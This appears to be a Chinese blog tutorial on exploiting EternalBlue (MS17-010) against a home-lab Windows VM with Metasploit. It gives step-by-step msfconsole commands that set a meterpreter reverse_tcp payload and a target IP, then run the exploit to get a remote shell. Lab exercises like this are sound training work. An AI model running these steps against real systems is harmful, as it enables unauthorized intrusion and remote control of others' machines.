msf攻击----永恒之蓝

一,安装靶机

需要在VMware中安装Windows10以下的系统作为靶机

Windows系统镜像下载站 (itellyou.cn)

二,使用模块

kali切换至root用户

sudo su

输入msfconsole打开msf6

msfconsole

搜索永恒之蓝(编号ms17_010)

search ms17_010

exploit 表示利用脚本攻击

auxiliary 表示检测漏洞的存在

三,设置必选项

选择模块(代号)

use 0

或者 (全称)

use exploit/windows........

查看设置

show options或者options

其中payload表示攻击载荷,攻击流程中起核心作用。一般都是默认的windows/x64/meterpreter/reverse_tcp,如果不是则要设置

set payload windows/x64/meterpreter/reverse_tcp

RHOSTS ,靶机的ip地址 

LHOST,监听的地址,即kali的ip地址。输入ifconfig可以查看,其中eth0表示以太网

LPORT,tcp逻辑端口0---65535,只要未被占用就可以随意设置

四,运行模块

攻击机(kali)与攻击对象(Windows10以下)必须处于同一个局域网内

打开准备好的Window系统,打开命令行输入ipconfig查看本机的ip地址

利用攻击机ping靶机的ip地址: ping 192.168.32.129 (一定要是自己靶机的地址)

如果靶机ip地址能ping通则设置为RHOSTS

set RHOSTS 192.168.32.129

然后输入run命令,等待payload打出去获取到靶机权限 

出现meterpreter表示得到靶机后渗透权限,即攻击成功

  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值